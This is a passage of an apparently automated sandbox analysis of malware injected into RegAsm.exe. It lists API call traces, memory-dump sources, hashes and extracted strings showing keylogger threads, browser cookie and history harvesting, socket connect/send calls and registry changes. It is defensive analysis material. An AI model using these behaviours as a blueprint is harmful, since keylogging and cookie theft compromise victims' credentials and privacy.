                              • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                              • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FB31
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: Process$OpenProcess32$NextWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: _free
                            APIs
                            • MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,0042DD92,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92), ref: 004511F9
                            • __alloca_probe_16.LIBCMT ref: 00451231
                            • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,0042DD92,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92,?), ref: 00451282
                            • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92,?,00000002,00000000), ref: 00451294
                            • __freea.LIBCMT ref: 0045129D
                              • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                            APIs
                            • GetEnvironmentStringsW.KERNEL32 ref: 1000715C
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1000717F
                              • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 100071A5
                            • _free.LIBCMT ref: 100071B8
                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 100071C7
                            Memory Dump Source
                            • Source File: 00000008.00000002.875960236.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000008.00000002.875951516.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.875960236.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                            Similarity
                            • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                            APIs
                            • GetEnvironmentStringsW.KERNEL32 ref: 0044F3E3
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F406
                              • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F42C
                            • _free.LIBCMT ref: 0044F43F
                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F44E
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                            APIs
                            • GetLastError.KERNEL32(00000000,?,00000000,1000636D,10005713,00000000,?,10002249,?,?,10001D66,00000000,?,?,00000000), ref: 10005B7F
                            • _free.LIBCMT ref: 10005BB4
                            • _free.LIBCMT ref: 10005BDB
                            • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BE8
                            • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BF1
                            Memory Dump Source
                            • Source File: 00000008.00000002.875960236.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000008.00000002.875951516.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.875960236.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                            Similarity
                            • API ID: ErrorLast$_free
                            APIs
                            • GetLastError.KERNEL32(?,00000000,00000000,0043BCD6,00000000,00000000,?,0043BD5A,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044831E
                            • _free.LIBCMT ref: 00448353
                            • _free.LIBCMT ref: 0044837A
                            • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448387
                            • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448390
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: ErrorLast$_free
                            APIs
                            • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                            • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                            • GetProcessImageFileNameW.PSAPI(00000000,?,00000104,?,00000000,00000000,00000000), ref: 0041C2B9
                            • CloseHandle.KERNEL32(00000000), ref: 0041C2C4
                            • CloseHandle.KERNEL32(00000000), ref: 0041C2CC
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: Process$CloseHandleOpen$FileImageName
                            APIs
                            • lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                            • lstrcatW.KERNEL32(?,?), ref: 10001EAC
                            • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                            • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                            • lstrcatW.KERNEL32(?,100010DF), ref: 10001ED3
                            Memory Dump Source
                            • Source File: 00000008.00000002.875960236.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000008.00000002.875951516.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.875960236.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                            Similarity
                            • API ID: lstrlen$lstrcat
                            APIs
                            • _free.LIBCMT ref: 100091D0
                              • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                              • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                            • _free.LIBCMT ref: 100091E2
                            • _free.LIBCMT ref: 100091F4
                            • _free.LIBCMT ref: 10009206
                            • _free.LIBCMT ref: 10009218
                            Memory Dump Source
                            • Source File: 00000008.00000002.875960236.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000008.00000002.875951516.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.875960236.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                            Similarity
                            • API ID: _free$ErrorFreeHeapLast
                            • String ID:
                            • API String ID: 776569668-0
                            • Opcode ID: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                            • Instruction ID: a08e021c65853776c99c3fd86fadada58ae96d962e635c5153d22f52a77de1c5
                            • Opcode Fuzzy Hash: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                            • Instruction Fuzzy Hash: 77F06DB161C650ABE664DB58EAC6C4B7BEDFB003E13608805FC4DD7549CB31FC809A64
                            APIs
                            • _free.LIBCMT ref: 00450A54
                              • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                              • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                            • _free.LIBCMT ref: 00450A66
                            • _free.LIBCMT ref: 00450A78
                            • _free.LIBCMT ref: 00450A8A
                            • _free.LIBCMT ref: 00450A9C
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free$ErrorFreeHeapLast
                            • String ID:
                            • API String ID: 776569668-0
                            • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                            • Instruction ID: 72fff71e7c38304dd33e0b5962bcef44c8ad6e5fbb3f6de42623dcf71f8de19c
                            • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                            • Instruction Fuzzy Hash: F7F012765053006B9620EB5DE883C1773D9EA157117A68C1BF549DB652C778FCC0866C
                            APIs
                            • _free.LIBCMT ref: 00444106
                              • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                              • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                            • _free.LIBCMT ref: 00444118
                            • _free.LIBCMT ref: 0044412B
                            • _free.LIBCMT ref: 0044413C
                            • _free.LIBCMT ref: 0044414D
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free$ErrorFreeHeapLast
                            • String ID:
                            • API String ID: 776569668-0
                            • Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                            • Instruction ID: 0e9c2896d1a2baf17e4b980eca3efa8a556ca0a6e45d827b59e8921ed08f8926
                            • Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                            • Instruction Fuzzy Hash: 91F03AB18025208FA731AF2DBD528053BA1A705720356853BF40C62A71C7B849C2DFDF
                            APIs
                            • _strpbrk.LIBCMT ref: 0044E7B8
                            • _free.LIBCMT ref: 0044E8D5
                              • Part of subcall function 0043BD68: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0043BD6A
                              • Part of subcall function 0043BD68: GetCurrentProcess.KERNEL32(C0000417,?,00405103), ref: 0043BD8C
                              • Part of subcall function 0043BD68: TerminateProcess.KERNEL32(00000000,?,00405103), ref: 0043BD93
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                            • String ID: *?$.
                            • API String ID: 2812119850-3972193922
                            • Opcode ID: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                            • Instruction ID: bbc13fc8ee10fdca904a4e9292213e09ebfa005f106ef5a16faeda3ce4fd08f7
                            • Opcode Fuzzy Hash: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                            • Instruction Fuzzy Hash: C251B175E00209AFEF14DFAAC881AAEF7B5FF58314F24416EE844E7341E6399A018B54
                            APIs
                            • GetKeyboardLayoutNameA.USER32(?), ref: 00409F0E
                              • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,020F4950,00000010), ref: 004048E0
                              • Part of subcall function 0041C5A6: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041C5BB
                              • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateFileKeyboardLayoutNameconnectsend
                            • String ID: XQG$NG$PG
                            • API String ID: 1634807452-3565412412
                            • Opcode ID: 1ee6739b3f537898a0ba5199207780b763cd7159a70fbe27a1bff6cd487590cc
                            • Instruction ID: 86122f73fea86c9dce3a8c8dcd7d10d1556e7c038dfd98f63e082762e027ad1b
                            • Opcode Fuzzy Hash: 1ee6739b3f537898a0ba5199207780b763cd7159a70fbe27a1bff6cd487590cc
                            • Instruction Fuzzy Hash: 955120315082419BC328FB32D851AEFB3E5AFD4348F50493FF54AA71E2EF78594A8649
                            APIs
                            • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 10004C1D
                            • _free.LIBCMT ref: 10004CE8
                            • _free.LIBCMT ref: 10004CF2
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.875960236.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000008.00000002.875951516.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.875960236.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                            Similarity
                            • API ID: _free$FileModuleName
                            • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                            • API String ID: 2506810119-1068371695
                            • Opcode ID: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                            • Instruction ID: 12f2da1a58c9c923660241357757b5dddff340f6d61411cdc8d35d961f62cc7a
                            • Opcode Fuzzy Hash: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                            • Instruction Fuzzy Hash: EB31A0B5A01258EFFB51CF99CC81D9EBBFCEB88390F12806AF80497215DA709E41CB54
                            APIs
                            • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 00443515
                            • _free.LIBCMT ref: 004435E0
                            • _free.LIBCMT ref: 004435EA
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free$FileModuleName
                            • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                            • API String ID: 2506810119-1068371695
                            • Opcode ID: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                            • Instruction ID: e5efe6401a3e5f1db0e1141fbbc5a3d1caea7301f6195c2e8eaff0a3f5655f7e
                            • Opcode Fuzzy Hash: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                            • Instruction Fuzzy Hash: D63193B1A00254BFEB21DF9A998199EBBF8EB84B15F10406BF40597311D6B88F41CB99
                            APIs
                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                              • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,638E1986,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                              • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5), ref: 004185B9
                              • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84), ref: 004185C2
                              • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                            • Sleep.KERNEL32(000000FA,00465E84), ref: 00404138
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                            • String ID: /sort "Visit Time" /stext "$0NG
                            • API String ID: 368326130-3219657780
                            • Opcode ID: f38496434feea30fe495744d679b1447ef1d4ad329803ceb635c4f7107d4ce0b
                            • Instruction ID: 7a7c83aa22bf4ff3424ba87d95d637a61540eed1193ecfb54830ab602693969f
                            • Opcode Fuzzy Hash: f38496434feea30fe495744d679b1447ef1d4ad329803ceb635c4f7107d4ce0b
                            • Instruction Fuzzy Hash: 2C316371A0011956CB15FBA6DC569ED7375AF90308F00007FF60AB71E2EF785D49CA99
                            APIs
                            • SystemParametersInfoW.USER32 ref: 0041CB68
                              • Part of subcall function 004137AA: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004137B9
                              • Part of subcall function 004137AA: RegSetValueExA.KERNEL32(?,004674C8,00000000,?,00000000,00000000), ref: 004137E1
                              • Part of subcall function 004137AA: RegCloseKey.KERNEL32(?), ref: 004137EC
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseCreateInfoParametersSystemValue
                            • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                            • API String ID: 4127273184-3576401099
                            • Opcode ID: 47ae7d430718f0ba875629653902a18f4ee72351ea8fb3e3ac61d5bcc2a18165
                            • Instruction ID: 8ac436d711b2fc3476497f69dc57c3b9a547a247a31514f467319d0910454585
                            • Opcode Fuzzy Hash: 47ae7d430718f0ba875629653902a18f4ee72351ea8fb3e3ac61d5bcc2a18165
                            • Instruction Fuzzy Hash: D7118472BC425022E81831396D9BFBE28068343F61F54456BF6022A6CAE4CF6A9143CF
                            APIs
                            • _wcslen.LIBCMT ref: 00416330
                              • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                              • Part of subcall function 004138B2: RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004), ref: 004138DB
                              • Part of subcall function 004138B2: RegCloseKey.KERNEL32(004660B4), ref: 004138E6
                              • Part of subcall function 00409E1F: _wcslen.LIBCMT ref: 00409E38
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: _wcslen$CloseCreateValue
                            • String ID: !D@$okmode$PG
                            • API String ID: 3411444782-3370592832
                            • Opcode ID: 85a472a8ed9fba8d48a13707545644fa305d45b1f9b2fecff8dfdaf9ddb1d636
                            • Instruction ID: 097cdf197a66b89fefcd85ce8a19d7acc75244c7017ebd4eb32b8c3ef24b572d
                            • Opcode Fuzzy Hash: 85a472a8ed9fba8d48a13707545644fa305d45b1f9b2fecff8dfdaf9ddb1d636
                            • Instruction Fuzzy Hash: 1E11A571B442011BDA187B32D862BBD22969F84348F80843FF546AF2E2DFBD4C51975D
                            APIs
                              • Part of subcall function 0040C4FE: PathFileExistsW.SHLWAPI(00000000), ref: 0040C531
                            • PathFileExistsW.SHLWAPI(00000000), ref: 0040C658
                            • PathFileExistsW.SHLWAPI(00000000), ref: 0040C6C3
                            Strings
                            • User Data\Default\Network\Cookies, xrefs: 0040C63E
                            • User Data\Profile ?\Network\Cookies, xrefs: 0040C670
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExistsFilePath
                            • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                            • API String ID: 1174141254-1980882731
                            • Opcode ID: d340a52fd8d1078a812560c7ffc03c5fafbdbc6e30ffa616e893859f76221ba6
                            • Instruction ID: a3c4a2fc075df05cc4efb8d324c4514c6f5a9a9113215be8183f294a60e8cc46
                            • Opcode Fuzzy Hash: d340a52fd8d1078a812560c7ffc03c5fafbdbc6e30ffa616e893859f76221ba6
                            • Instruction Fuzzy Hash: 0621E27190011A96CB14FBA2DC96DEEBB7CAE50319B40053FF506B31D2EF789946C6D8
                            APIs
                              • Part of subcall function 0040C561: PathFileExistsW.SHLWAPI(00000000), ref: 0040C594
                            • PathFileExistsW.SHLWAPI(00000000), ref: 0040C727
                            • PathFileExistsW.SHLWAPI(00000000), ref: 0040C792
                            Strings
                            • User Data\Default\Network\Cookies, xrefs: 0040C70D
                            • User Data\Profile ?\Network\Cookies, xrefs: 0040C73F
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExistsFilePath
                            • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                            • API String ID: 1174141254-1980882731
                            • Opcode ID: a04e00169c7cbbbccb250a5240b13a8e35c904a89c0728d580383dd97c6ecba8
                            • Instruction ID: 531025beeaae0c5c42121d483a56170e39db3028f8febaf9efde6b64dfa31b71
                            • Opcode Fuzzy Hash: a04e00169c7cbbbccb250a5240b13a8e35c904a89c0728d580383dd97c6ecba8
                            • Instruction Fuzzy Hash: 4821127190011A96CB04F7A2DC96CEEBB78AE50359B40013FF506B31D2EF789946C6D8
                            APIs
                            • CreateThread.KERNEL32(00000000,00000000,0040A2B8,?,00000000,00000000), ref: 0040A239
                            • CreateThread.KERNEL32(00000000,00000000,0040A2A2,?,00000000,00000000), ref: 0040A249
                            • CreateThread.KERNEL32(00000000,00000000,0040A2C4,?,00000000,00000000), ref: 0040A255
                              • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B1AD
                              • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateThread$LocalTimewsprintf
                            • String ID: Offline Keylogger Started
                            • API String ID: 465354869-4114347211
                            • Opcode ID: d2c6c6b1c115abd6082bc8f8898abe3c453afa196391d6f5d8e81b2196ab674b
                            • Instruction ID: fa9a7328340dc7f48b0d085764b542104813bfc3ea66268f7111ac5d0199d402
                            • Opcode Fuzzy Hash: d2c6c6b1c115abd6082bc8f8898abe3c453afa196391d6f5d8e81b2196ab674b
                            • Instruction Fuzzy Hash: 1111ABB12003187ED210BB368C87CBB765DDA4139CB40057FF946221C2EA795D14CAFB
                            APIs
                              • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B1AD
                              • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                              • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                            • CreateThread.KERNEL32(00000000,00000000,Function_0000A2A2,?,00000000,00000000), ref: 0040AFA9
                            • CreateThread.KERNEL32(00000000,00000000,Function_0000A2C4,?,00000000,00000000), ref: 0040AFB5
                            • CreateThread.KERNEL32(00000000,00000000,0040A2D0,?,00000000,00000000), ref: 0040AFC1
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateThread$LocalTime$wsprintf
                            • String ID: Online Keylogger Started
                            • API String ID: 112202259-1258561607
                            • Opcode ID: f3d6b4abe48f6a11fbf35fca459408289a3e67c664991f394f7c553c248ea070
                            • Instruction ID: 1fd114496b08e8c1d91a2f23279a740fccf8855fe00c80ef0b78f2cd7c44f0e8
                            • Opcode Fuzzy Hash: f3d6b4abe48f6a11fbf35fca459408289a3e67c664991f394f7c553c248ea070
                            • Instruction Fuzzy Hash: 2A01C4A07003193EE62076368C8BDBF7A6DCA91398F4004BFF641362C2E97D1C1586FA
                            APIs
